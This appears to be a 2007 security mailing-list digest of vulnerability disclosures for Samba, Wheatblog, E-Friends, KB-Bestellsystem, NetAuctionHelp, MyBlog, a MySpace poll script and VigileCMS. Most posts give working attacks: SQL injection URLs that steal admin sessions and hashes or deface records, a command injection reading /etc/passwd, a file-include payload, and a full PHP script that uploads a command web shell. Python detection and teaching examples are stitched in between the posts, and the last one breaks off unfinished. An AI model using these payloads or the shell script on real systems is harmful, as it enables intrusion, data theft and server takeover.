[ MDKSA-2007:224-1 ] - Updated samba packages fix vulnerabilities

2007-11-22 Thread security

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory   MDKSA-2007:224-1
 http://www.mandriva.com/security/
 ___
 
 Package : samba
 Date: November 21, 2007
 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 The samba developers discovered that nmbd could be made to overrun a
 buffer during the processing of GETDC logon server requests.  If samba
 is configured as a Primary or Backup Domain Controller, this could
 be used by a remote attacker to send malicious logon requests and
 possibly cause a denial of service (CVE-2007-4572).
 
 As well, Alin Rad Pop of Secunia Research found that nmbd did not
 properly check the length of netbios packets.  If samba is configured
 as a WINS server, this could be used by a remote attacker able to
 send multiple crafted requests to nmbd, resulting in the execution
 of arbitrary code with root privileges (CVE-2007-5398).

 Update:

 The patch that fixed CVE-2007-4572 introduced a regression that would
 prevent shares from being mounted properly and would cause the remote
 (patched) smbd to crash.  This update contains another fix from
 upstream to correct the problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4572
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5398
 https://bugzilla.samba.org/show_bug.cgi?id=5087
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 4b52bbf1bcea6c92e5e27e4b3be9921c  
2007.0/i586/libsmbclient0-3.0.23d-2.5mdv2007.0.i586.rpm
 0e287962bad4921a4eb1fe35e8afa867  
2007.0/i586/libsmbclient0-devel-3.0.23d-2.5mdv2007.0.i586.rpm
 1f72ecfa1bfb10cfad00514c078fee75  
2007.0/i586/libsmbclient0-static-devel-3.0.23d-2.5mdv2007.0.i586.rpm
 8e34665453b13707225463e51a17419b  
2007.0/i586/mount-cifs-3.0.23d-2.5mdv2007.0.i586.rpm
 ad4581add35fa10e229dd1d8355009fd  
2007.0/i586/nss_wins-3.0.23d-2.5mdv2007.0.i586.rpm
 4d4bbca4f9bd6cfb238ee8c1a049a5d1  
2007.0/i586/samba-client-3.0.23d-2.5mdv2007.0.i586.rpm
 f9e7dbb40360dd08db9e3a2bbab1da5a  
2007.0/i586/samba-common-3.0.23d-2.5mdv2007.0.i586.rpm
 0a45d85d642b6c2f6e75e23c5591b504  
2007.0/i586/samba-doc-3.0.23d-2.5mdv2007.0.i586.rpm
 05fa226646de72131aa58b829db0c91b  
2007.0/i586/samba-server-3.0.23d-2.5mdv2007.0.i586.rpm
 ca205264e05dd03a396de8ca58b3208f  
2007.0/i586/samba-smbldap-tools-3.0.23d-2.5mdv2007.0.i586.rpm
 21a749eb15c85acabddb45fa49623f21  
2007.0/i586/samba-swat-3.0.23d-2.5mdv2007.0.i586.rpm
 c9ee96941a97241e0ad030b82996cbec  
2007.0/i586/samba-vscan-clamav-3.0.23d-2.5mdv2007.0.i586.rpm
 6cb28d4f52ace9ef971d4e531ecee06d  
2007.0/i586/samba-vscan-icap-3.0.23d-2.5mdv2007.0.i586.rpm
 a280f39e86311192d914aaec5b4ada1d  
2007.0/i586/samba-winbind-3.0.23d-2.5mdv2007.0.i586.rpm 
 f57636830c90f965ef2f77735535f22f  
2007.0/SRPMS/samba-3.0.23d-2.5mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 39b22c9940e00093e38e592b87698a27  
2007.0/x86_64/lib64smbclient0-3.0.23d-2.5mdv2007.0.x86_64.rpm
 9f8698b5b8f57c040a9ebe2578797043  
2007.0/x86_64/lib64smbclient0-devel-3.0.23d-2.5mdv2007.0.x86_64.rpm
 c4a3f6ef7e926f36dd377d4709e621e6  
2007.0/x86_64/lib64smbclient0-static-devel-3.0.23d-2.5mdv2007.0.x86_64.rpm
 24d6b769cdc117762b3013b6198e  
2007.0/x86_64/mount-cifs-3.0.23d-2.5mdv2007.0.x86_64.rpm
 b114782608c8f27d05cf9b5120c07a4b  
2007.0/x86_64/nss_wins-3.0.23d-2.5mdv2007.0.x86_64.rpm
 fa7c98956081e2d84c9ccc92273d12a8  
2007.0/x86_64/samba-client-3.0.23d-2.5mdv2007.0.x86_64.rpm
 c05921fb231990a8a69f2c439d1df965  
2007.0/x86_64/samba-common-3.0.23d-2.5mdv2007.0.x86_64.rpm
 f35a2d243f6db6a1b9e17926658adbc2  
2007.0/x86_64/samba-doc-3.0.23d-2.5mdv2007.0.x86_64.rpm
 c11cf53381a514bf769e0ae2f1bfd1d8  
2007.0/x86_64/samba-server-3.0.23d-2.5mdv2007.0.x86_64.rpm
 f589c03f28168ec4cf5903bb400fbaae  
2007.0/x86_64/samba-smbldap-tools-3.0.23d-2.5mdv2007.0.x86_64.rpm
 96efed0918798808193d2991782583dc  
2007.0/x86_64/samba-swat-3.0.23d-2.5mdv2007.0.x86_64.rpm
 d176d6f29df246de80d93639225eefe9  
2007.0/x86_64/samba-vscan-clamav-3.0.23d-2.5mdv2007.0.x86_64.rpm
 d496a935398d0eb974f2a39367505e6c  
2007.0/x86_64/samba-vscan-icap-3.0.23d-2.5mdv2007.0.x86_64.rpm
 5f1367f9731082b88dd4155055876d20  
2007.0/x86_64/samba-winbind-3.0.23d-2.5mdv2007.0.x86_64.rpm 
 f57636830c90f965ef2f77735535f22f  
2007.0/SRPMS/samba-3.0.23d-2.5mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 14b3343c22199bd8a70e13020dc08e70  
2007.1/i586/libsmbclient0-3.0.24-2.4mdv2007.1.i586.rpm
 30c1e225dd4cd4b8613d37a003f6686e  
2007.1/i586/libsmbclient0-devel-3.0.24-2.4mdv2007.1.i586.rpm
 6fffd07522acb0ebf439a6efdc7171d2  
2007.1/i586/libsmbclient0-static-devel-3.0.24-2.4mdv2007.1.i586.rpm
 

Wheatblog (wB) Remote File inclusion ..

2007-11-22 Thread security
Hello,


Wheatblog (wB) Remote File inclusion ..


Tested on 1.1; older versions are also injectable.


Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : [EMAIL PROTECTED]


Remote File Inclusion

file : includes/sessions.php


line 2 :

code:-

include_once("$wb_class_dir/classDatabase.php");


The variable wb_class_dir can be controlled and edited to include a file from a remote host.


Solution


replace

code :-

include_once("$wb_class_dir/classDatabase.php");


with

code:-

// Protected By : HACKERS PAL

// [EMAIL PROTECTED]

// Http://WwW.SoQoR.NeT


// Refuse direct requests for this file, and refuse a wb_class_dir that
// arrived with the request.  (The posted check read $_GLOBALS, which is not
// a PHP superglobal and so never fires; $_REQUEST is what was evidently meant.)
if(eregi("sessions.php",$PHP_SELF) || isset($_REQUEST['wb_class_dir']))

{

  die("<h1>Forbidden 403<br>Protected By : HACKERS PAL</h1>");

}

include_once("$wb_class_dir/classDatabase.php");



Exploit : -

includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?


#WwW.SoQoR.NeT


[ECHO_ADV_85$2007] alstrasoft E-Friends <= 4.98 (seid) Multiple Remote SQL Injection Vulnerabilities

2007-11-22 Thread erdc
ECHO_ADV_85$2007


-

[ECHO_ADV_85$2007] alstrasoft E-Friends <= 4.98 (seid) Multiple Remote SQL Injection Vulnerabilities

-


Author : M.Hasran Addahroni

Date   : November 15th, 2007

Location   : Australia, Sydney

Web: http://advisories.echo.or.id/adv/adv85-K-159-2007.txt

Critical Lvl   : Critical

Impact : System access

Where  : From Remote

---


Affected software description:




Application   : E-Friends  

version   : <= 4.98

Vendor: http://www.alstrasoft.com/efriends.htm

Description :


E-Friends is an online social networking script that allows you to start your 
own profitable community just like Friendster and MySpace social networking 
site plus the ability to offer paid membership subscriptions. E-Friends allow 
members to connect to people in their personal networks and make friends, match 
making, dating, blogging and join groups and events. Features include email 
importer, messaging system, classifieds, join groups, forums, affiliate program 
integrated, online chat, personal blog, calendar, custom profile URL, friends 
search, invite friends, hotornot image ranking, advance admin control panel, 
upload photos and many more.


---


Vulnerability:

~~


Input passed to the seid parameter in the events module is not properly verified 
before being used in an SQL query. 

This can be exploited through the browser to get members' MD5 password hashes 
and to retrieve the admin session ID.

Successful exploitation requires that magic_quotes is off.



Poc/Exploit:

~~

1.Retrieve Admin SessionID :


http://target.com/index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,sess_id,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin--


Use the SessionID in this URL:


http://target.com/admin.php?mode=users_manager&adsess=SESSION_ID


2.Get members' usernames and MD5 hashes:

http://target.org/index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,concat(mem_id,0x3a,username,0x3a,email,0x3a,password,0x3a,fname),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20members--




Dork:

~

Google  : JOIN OUR SITE Today. It's FREE!



Solution:

~~~


- Edit the source code to ensure that input is properly verified.

- Turn on magic_quotes in php.ini

 


Timeline:

~


- 15-11-2007 bug found

- 21-11-2007 vendor contacted

- 22-11-2007 advisory published

---


Shoutz:

~

~ ping - my dearest wife, 'zizou' zautha - my lovely son, for all the luv, the 
tears n the breath

~ y3dips,the_day,m0by,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, 
az01,negative,the_hydra,neng chika, str0ke

~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw

~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, 
stev_manado, nofry,ketut,x16

~ [EMAIL PROTECTED]

~ #aikmel #e-c-h-o @irc.dal.net


---

Contact:

~~


 K-159 || echo|staff || eufrato[at]gmail[dot]com

 Homepage: http://k-159.echo.or.id/


 [ EOF ] --
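The integer-context injection in the seid parameter, as an added example that is not part of this advisory or of E-Friends: a two-table SQLite stand-in for the application's schema (constructed here; the four-column events table and its column names are assumptions, the real query selects 27 columns), queried first by string concatenation and then with an integer check plus a bound parameter. The MySQL-only pieces of the second PoC (concat() with 0x3a literals) are not reproduced.

```python
"""Union-based SQL injection through an unescaped integer id, and the fix.

Added example, not E-Friends or ECHO code.  The two tables are a constructed
stand-in for the application's schema: 'events' has four columns (the real
query selects 27) and 'admin' carries the session id the advisory extracts.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (in memory, so the example runs offline)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE events (eid INTEGER, title TEXT, place TEXT, owner TEXT);
        INSERT INTO events VALUES (1, 'Launch party', 'Sydney', 'alice');
        CREATE TABLE admin (id INTEGER, username TEXT, sess_id TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'f00d1234deadbeef');
        """
    )
    return con


def view_event_vulnerable(con: sqlite3.Connection, seid: str) -> list:
    """The flaw: the request parameter is pasted into the SQL text unchanged."""
    sql = "SELECT eid, title, place, owner FROM events WHERE eid=" + seid
    return con.execute(sql).fetchall()


def view_event_fixed(con: sqlite3.Connection, seid: str):
    """The fix: reject anything that is not an integer, then bind the value.

    Returns None for a malformed id instead of running any query at all.
    """
    try:
        eid = int(seid)
    except ValueError:
        return None
    return con.execute(
        "SELECT eid, title, place, owner FROM events WHERE eid=?", (eid,)
    ).fetchall()


# Shaped like the advisory's first PoC: an id that matches nothing, then a
# UNION with the same column count that pulls sess_id out of the admin table.
# The payload contains no quote character at all: the id sits in a numeric
# context, so escaping quotes on its own leaves it unchanged.
PAYLOAD = "-1 union select 1,2,sess_id,4 from admin--"


def leaked_session_id(con: sqlite3.Connection) -> str:
    """What an attacker reads back from the vulnerable handler."""
    rows = view_event_vulnerable(con, PAYLOAD)
    return rows[0][2]          # the column position the payload mapped sess_id onto


if __name__ == "__main__":
    db = make_db()
    print("legit id, vulnerable :", view_event_vulnerable(db, "1"))
    print("payload, vulnerable  :", view_event_vulnerable(db, PAYLOAD))
    print("payload, fixed       :", view_event_fixed(db, PAYLOAD))
```

The column count in the UNION has to equal that of the original SELECT (four here, 27 in the real application), which is why the PoC pads with literal numbers; the value returned in the chosen column position is the session id the second PoC URL then uses.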


Remote Shell Command Execution in KB-Bestellsystem (amensa-soft.de)

2007-11-22 Thread zero-x
KB-Bestellsystem is a domain order system written in Perl.

The domain and tld parameters in kb_whois.cgi do not filter shell 
metacharacters.


The following examples will show you the /etc/passwd file:


http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=

http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=


 Greetz Zero X 


Aria-Security.net: NetAuctionHelp SQL Injection

2007-11-22 Thread no-reply
Aria-Security Net

Original Advisory @ http://aria-security.net/forum/showthread.php?p=1099



Vendor: http://www.netauctionhelp.com


PoC:

search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION]

search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1--


search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)--

search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)--




tblAd.id

tblAd.aspectratio

tblAd.title

tblAd.imagepath

tblAd.startdate

tblAd.enddate

tblAd.id_seller

tblAd.descr


-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--


This code will update itemdetl.asp?id=1



Credit goes to Aria-Security.Net

Greetz: AurA
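The three request shapes quoted in this and the two preceding posts (the union select against seid, the ";cat /etc/passwd;" in domain, and the convert(int,@@version) probe in nsearch), seen from the defender's side. This is an added example, not from any of the advisories: it parses Apache combined-format lines, decodes each query-string value, and tags the values that match a small signature list. The log lines are constructed around the PoC URLs (with the "&" separators the list archive stripped restored); the client addresses and timestamps are invented.

```python
"""Flagging the injection attempts quoted in this digest in web-server access logs.

Added example, not from any of the advisories.  The five log lines are
constructed in Apache combined format around the PoC URLs; hosts and
timestamps are made up.
"""
import re
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Each signature is applied to every decoded query-string value.
# The metachar rule is noisy on its own; scope it to parameters that reach a
# shell (here: 'domain'/'tld' of kb_whois.cgi) before alerting on it alone.
SIGNATURES = [
    ("sqli-union",       re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)),
    ("sqli-mssql-probe", re.compile(r"@@(version|servername)\b|\bconvert\s*\(\s*int\b", re.I)),
    ("sqli-comment",     re.compile(r"--\s*$|/\*")),
    ("cmdi-metachar",    re.compile(r"[;|`]|\$\(")),
    ("cmdi-sensitive",   re.compile(r"/etc/(passwd|shadow)\b")),
]


def decode_query(target: str) -> list:
    """Split the request target into (name, value) pairs, percent-decoded.

    Done by hand rather than with parse_qsl so that a ';' inside a value is
    kept as data (older parse_qsl treats it as a pair separator), which is
    exactly the character the command-injection PoC relies on.
    """
    if "?" not in target:
        return []
    query = target.split("?", 1)[1]
    pairs = []
    for item in query.split("&"):
        name, _, value = item.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def scan_line(line: str) -> list:
    """Return one finding per parameter value that matches a signature."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    for name, value in decode_query(m.group("target")):
        tags = [tag for tag, rx in SIGNATURES if rx.search(value)]
        if tags:
            findings.append({"ip": m.group("ip"), "param": name,
                             "value": value, "tags": tags})
    return findings


def scan_log(lines) -> list:
    out = []
    for line in lines:
        out.extend(scan_line(line))
    return out


# Constructed sample: three attacks, two benign requests (one containing the
# word "union" in ordinary text, to show the union rule needs a following select).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Nov/2007:10:15:03 +0000] "GET /index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,sess_id,5%20from%20admin-- HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.6 - - [22/Nov/2007:10:16:44 +0000] "GET /kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif= HTTP/1.0" 200 2201 "-" "curl/7.16"
10.0.0.7 - - [22/Nov/2007:10:17:10 +0000] "GET /search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1'%20or%201=convert(int,@@version)-- HTTP/1.1" 500 812 "-" "Mozilla/4.0"
10.0.0.8 - - [22/Nov/2007:10:18:00 +0000] "GET /index.php?mode=events&act=viewevent&seid=42 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.9 - - [22/Nov/2007:10:18:31 +0000] "GET /search.asp?nsearch=union+station+cafe HTTP/1.1" 200 3010 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f["ip"], f["param"], f["tags"], repr(f["value"]))
```

Decoding before matching matters: the first PoC is sent with %20 for every space, so a signature run over the raw request line would have to know every encoding the attacker might choose. The 500 status on the convert(int,@@version) line is also worth correlating, since that probe works precisely by provoking a conversion error.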



[Argeniss] Data0: Next generation malware for stealing databases (Paper)

2007-11-22 Thread Cesar
Hey, I'm releasing this new paper, not big deal but
interesting.
http://www.argeniss.com/research/Data0.pdf

Abstract: 
This paper is about Data0, a fictitious (or not)
simple PoC of new malware that, after it is 
deployed on a computer in an internal network, will
automatically hack database servers and 
steal their data. Several techniques used by Data0
will be detailed. Data0 will be targeting 
Microsoft SQL Server and Oracle Database Server, two of
the most used database servers. 
While Data0 could be used by the bad guys for evil
purposes, it could also be used by security 
professionals and organizations to determine how
strong networks, workstations, database 
servers, etc. are against this kind of attack. 
This paper is not intended to be a cook book for cyber
criminals, it's intended to show people 
that by implementing simple techniques malware can
become “smarter” and cause a lot more 
damage in a very near future.


Cesar.


  



MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..

2007-11-22 Thread security
Hello,


MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..


http://sourceforge.net/projects/myblog/


Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : [EMAIL PROTECTED]


Exploit : -

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/*  MyCMS Command Execution
/*  This exploit should allow you to execute commands
/*    By : HACKERS PAL
/*    WwW.SoQoR.NeT
*/
echo('
/**********************************************/
/*  MyCmS Command Execution                   */
/*    by HACKERS PAL [EMAIL PROTECTED]        */
/* site: http://www.soqor.net                 */');
if ($argc<4) {
print_r('
/* ------------------------------------------ */
/* Usage: php '.$argv[0].' host path cmd
/* Example:                                   */
/*    php '.$argv[0].' localhost /freewps/ id
/* ------------------------------------------ */
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

// Fetch a URL; fall back to fopen()/fread() if file_get_contents() is unavailable
function get_page($url)
{
  if(function_exists("file_get_contents"))
  {
    $contents = file_get_contents($url);
  }
  else
  {
    $contents = "";
    $fp=fopen($url,"r");
    while($line=fread($fp,1024))
    {
      $contents=$contents.$line;
    }
    fclose($fp);
  }
  return $contents;
}

// Send one raw HTTP request and read the whole reply into the global $html
function connect($packet)
{
  global $host, $port, $html;
  $con=fsockopen(gethostbyname($host),$port);
  if (!$con)
  {
    echo '[-] Error - No response from '.$host.':'.$port; die;
  }
  fputs($con,$packet);
  $html='';
  while (!feof($con))      // read until the server closes (Connection: Close below)
  {
    $html.=fread($con,1024);
  }
  fclose($con);
}

$i=0;
$data="";
// multipart boundary; the same string goes into the Content-Type header below
$boundary="---------------------------7d62702f250530";

// Append one multipart/form-data part to $data ("init" appends the closing boundary)
function add_data($name,$value,$type="no",$filename="")
{
  GLOBAL $data,$i,$boundary;
  if($type=="file")
  {
    $data.="--".$boundary."
Content-Disposition: form-data; name=\"$filename\"; filename=\"$name\";
Content-Type: text/plain

$value
";
  }
  elseif($type=="init")
  {
    $data.="--".$boundary."--";
  }
  elseif($type=="clean")
  {
    $data="";
  }
  else
  {
    $data.="--".$boundary."
Content-Disposition: form-data; name=\"$name\";
Content-Type: text/plain

$value
";
  }
}

$host=$argv[1];
$path=$argv[2];
$cmd=$argv[3];
$port=80;

$cmd=urlencode($cmd);

$p='http://'.$host.':'.$port.$path;

echo "\n[+] Trying to Upload File";

// the cookie separator was lost in the posted copy; the standard "; " is used here
$cookie="admin=1; login=HACKERS%20PAL";

// PHP shell that admin/settings.php writes to disk; it is then reached via index.php?cmd=
$contents='<?php
echo "Shell By : HACKERS PAL :)
<br><a href=\"http://www.soqor.net\">WwW.SoQoR.NeT</a><br>
";
$cmd=($_GET["cmd"])?$_GET["cmd"]:$_POST["cmd"];
system($cmd);
die();
?>';

add_data("","");
add_data("content",$contents);
add_data('','',"init");

$packet="POST ".$p."admin/settings.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; boundary=".$boundary."\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
$packet.=$data;
connect($packet);

if (eregi("Main Blog Settings",$html))
{
  echo "\n[+] Successfully uploaded ...\n[+] Go To ".$p."index.php?cmd=".$cmd." for your own commands.. \n[+] The Result Of The Command\n";
  echo get_page($p."index.php?cmd=".$cmd);
}
else
{
  echo "\n[-] Unable to Upload File\n[-] Exploit Failed";
}
echo ("\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/");
?>


#WwW.SoQoR.NeT


Re: Simple Machines Forum multiple sql injection flaws with exploit code.

2007-11-22 Thread root
Do you know what kind of hash the passwords are stored as? Are they salted?


MySpace Scripts - Poll Creator JavaScript Injection Vulnerability

2007-11-22 Thread DoZ
[HSC]MySpace Scripts - Poll Creator JavaScript Injection Vulnerability



Our MySpace Poll Creator script is the ultimate addition to your MySpace resource 
site. The script enables your user to quickly and easily create a poll that they 
can post to profile or bulletin to all their friends. Everyone loves to create a 
poll and gather opinions and this isn't something that's available on every other 
MySpace resource site.



Hackers Center Security Group (http://www.hackerscenter.com)

Credit: Doz



Risk: Medium 

Class: Input Validation Error



Vendor: http://www.m2scripts.com

Product: MySpace Scripts - Poll Creator



* Attackers can exploit these issues via a web client.



Cross-Site Scripting:


http://www.victim.com/poll/index.php/XSS



Example of Advanced Exploitation of the Application:


Once we have found that the application is vulnerable to JavaScript injection, we see
that there is a form that will be our source of input to alter the page source code of the files.
Now we can advance this type of attack by injecting an evil script through 
/poll/index.php?action=create_new. Now we can inject any code into the Raw Form Box 
and submit. This will leave persistent code on the server side.




Example: http://www.victim.com/poll/index.php?action=create_new









VigileCMS <= 1.8 Stealth Remote Command Execution Exploit

2007-11-22 Thread bugtraq
Opencosmo Security

http://www.opencosmo.com

http://www.opencosmo.com/news.php?readmore=15



VigileCMS <= 1.8 Stealth Remote Command Execution Exploit

Credits: The:Paradox

Application: VigileCMS

Version: 1.8

Impact: Remote Command Execution

Risk: [3/5]


Exploit: #!/usr/bin/python

#-*- coding: iso-8859-15 -*-

'''

_ _ _

| |_| |_ ___ _ _ __ __ _ _ _ __ _ __| |_ __

| _| ' \/ -_)|_|| '_ \/ _` | '_/ _` / _` / _ \ \ /

\__|_||_\___||_|| .__/\__,_|_| \__,_\__,_\___/_\_\

|_|



This is a Public Exploit. 22/10/2007 (dd-mm-yyyy)



§ 0day VigileCMS 1.8 Stealth and maybe lower versions - Remote Command Execution §

Vendor: http://www.vigilenapoletano.it

Severity: Highest

Author: The:Paradox

Italy r0x.


Visit inj3ct-it.org


Comments: This exploit was coded to show some people what a real vulnerability is.



Related Codes:


--- index.php; line 64:


if (isset($_COOKIE["rem_user"]) and isset ($_COOKIE["rem_pass"]) and !isset($_SESSION["user"])) {
    // "remember me" login: the user is accepted if a file named <user><pass>.php exists
    if(file_exists(USERS_TAB."/".$_COOKIE["rem_user"].$_COOKIE["rem_pass"].".php")){
        $_SESSION["user"] = $_COOKIE["rem_user"];
        $_SESSION["pass"] = $_COOKIE["rem_pass"];
        logthis($_SESSION["user"]." si è collegato al Sito: riconosciuto con Cookie!"); // "... logged in to the site: recognised by cookie!"
        UserVisita (); // update the user's database record with the number of visits
    }
}


--- func.inc.php; line 93:


function is_admin(){ //## FUNCTION ##
    // admin if a file named <user><pass>.php exists under ADMIN_TAB
    if( (isset($_SESSION["user"]) and isset($_SESSION["pass"])) && (file_exists(ADMIN_TAB."/".$_SESSION["user"].$_SESSION["pass"].".php")) ){
        return true;
    } else {
        return false;
    }
}


--- func.inc.php; line 109:


function is_superadmin(){ //## FUNCTION ##
    include (LOGS_TAB."/creazione.php"); // sets $primo_amministra, the first administrator
    if (isset($_SESSION["user"]) and isset($_SESSION["pass"]) and ($_SESSION["user"]==$primo_amministra)) {
        return true;
    } else {
        return false;
    }
}


--- vedipm.php; line 210:


if ($_POST["ttl"] =="") $_POST["ttl"]="Nessun oggetto"; // "No subject"

$_POST["ttl"] =stripslashes($_POST["ttl"]);
$_POST["ttl"] =htmlspecialchars($_POST["ttl"]); // stops HTML and malicious characters such as javascript from being rendered
$_POST["cont"]=stripslashes($_POST["cont"]);
$_POST["cont"]=htmlspecialchars($_POST["cont"]); // stops HTML and malicious characters such as javascript from being rendered
$_POST["cont"]=str_replace("\r\n","[br]",$_POST["cont"]);
$_POST["cont"]=str_replace("~","|",$_POST["cont"]);
$_POST["ttl"]=str_replace("~","|",$_POST["ttl"]);

$time = time();

// one line per message, fields separated by "~"; $_SESSION[user] is written unfiltered
$newpm = fopen (PM_TAB."/".$_POST["to"], "a");
fwrite ($newpm, "$_POST[ttl]~$_POST[cont]~$_SESSION[user]~$time~non_letto\r\n");
fclose($newpm);



Bug Explanation:


The platform presents some vulnerabilities in the login system and in the 
private message sender system.

The first vulnerability is in index.php, which verifies the login without an SQL 
database by checking the existence of files with the structure 
Nick.HashMD5Password.php in a db directory.

The CMS's coder didn't think about directory traversal. In fact, if we try to 
login with these cookies:


rem_user = /../users/Nick

rem_pass = HashMD5Password


where Nick and HashMD5Password are an existing username and MD5 password 
hash, we'll gain administration rights. This happens because the function 
is_admin will check the file existence of 
/db/admin/../users/Nick.HashMD5Password.php

Obviously this may work with any file (with some collateral errors because it 
missed an include :P)

However, this doesn't let us do a lot of actions in the control panel 
because we will not have superadmin rights (see the is_superadmin() function).

The second vulnerability is in vedipm.php and lets us write a file on 
the server, but we can't get RCE because our actions are limited by 
htmlspecialchars, which changes the characters of PHP code ( < > ). However, 
$_SESSION[user] is not passed through htmlspecialchars.

Using the first and the second vulnerability we can gain RCE. We will create 
a file named with PHP code; with this we'll login and get an evil 
$_SESSION[user] that will be written into a PHP file.



A lot of other vulnerabilities have been found in this platform, but their 
functionality depends on MAGIC QUOTES being OFF or on other uses of the 
vulnerabilities I explained, so they were not published.



Google Dork- Powered by Cms Vigile



Use this exploit at your own risk. You are responsible for your own deeds.

Not tested on versions < 1.6.
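The two path constructions in this digest that take attacker-controlled text, Wheatblog's include_once("$wb_class_dir/classDatabase.php") and VigileCMS's file_exists(ADMIN_TAB."/".$user.$pass.".php"), redone in Python as an added example (not code from either project) so the effect can be observed and the containment check both lack can be shown. It builds a db/admin and db/users tree in a temporary directory following the index.php snippet above (user and hash concatenated, then .php); the allowed nick pattern and the password hash are assumptions.

```python
"""Attacker-controlled text inside a file path: the include case and the traversal case.

Added example, not Wheatblog or VigileCMS code.  It mirrors the two path
constructions quoted in this digest so their effect can be observed, then adds
the containment check both applications lack.  The db/admin and db/users tree
is built in a temporary directory; file names follow the index.php snippet
(user and hash concatenated, then ".php").  The allowed nick pattern and the
password hash are assumptions.
"""
import hashlib
import os
import re
import shutil
import tempfile
from urllib.parse import urlsplit

USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")   # assumed: what a nick may contain
MD5_RE = re.compile(r"[0-9a-f]{32}")


def rfi_target(wb_class_dir: str) -> dict:
    """Where include_once("$wb_class_dir/classDatabase.php") actually points.

    If the value is a URL (and allow_url_include is on), the include becomes
    an HTTP fetch.  A trailing '?' in the value pushes the fixed
    '/classDatabase.php' suffix into the query string, which is why the
    Wheatblog PoC ends with one.
    """
    parts = urlsplit(wb_class_dir + "/classDatabase.php")
    return {"remote": parts.scheme in ("http", "https", "ftp"),
            "path": parts.path, "query": parts.query}


def vigile_is_admin(admin_tab: str, user: str, pw_hash: str) -> bool:
    """Mirror of is_admin(): file_exists(ADMIN_TAB."/".$user.$pass.".php").

    Plain string concatenation, so a '..' inside $user walks out of ADMIN_TAB.
    """
    return os.path.exists(admin_tab + "/" + user + pw_hash + ".php")


def is_contained(base: str, candidate: str) -> bool:
    """True only if candidate resolves to a location inside base."""
    base = os.path.realpath(base)
    candidate = os.path.realpath(candidate)
    return os.path.commonpath([base, candidate]) == base


def is_admin_fixed(admin_tab: str, user: str, pw_hash: str) -> bool:
    """Allow-list the inputs, then still confine the resulting path to ADMIN_TAB."""
    if not USERNAME_RE.fullmatch(user) or not MD5_RE.fullmatch(pw_hash):
        return False
    candidate = admin_tab + "/" + user + pw_hash + ".php"
    return is_contained(admin_tab, candidate) and os.path.exists(candidate)


def build_fixture():
    """Constructed layout: one ordinary user (Nick) and one real admin (Boss)."""
    root = tempfile.mkdtemp(prefix="vigile-")
    os.makedirs(os.path.join(root, "db", "admin"))
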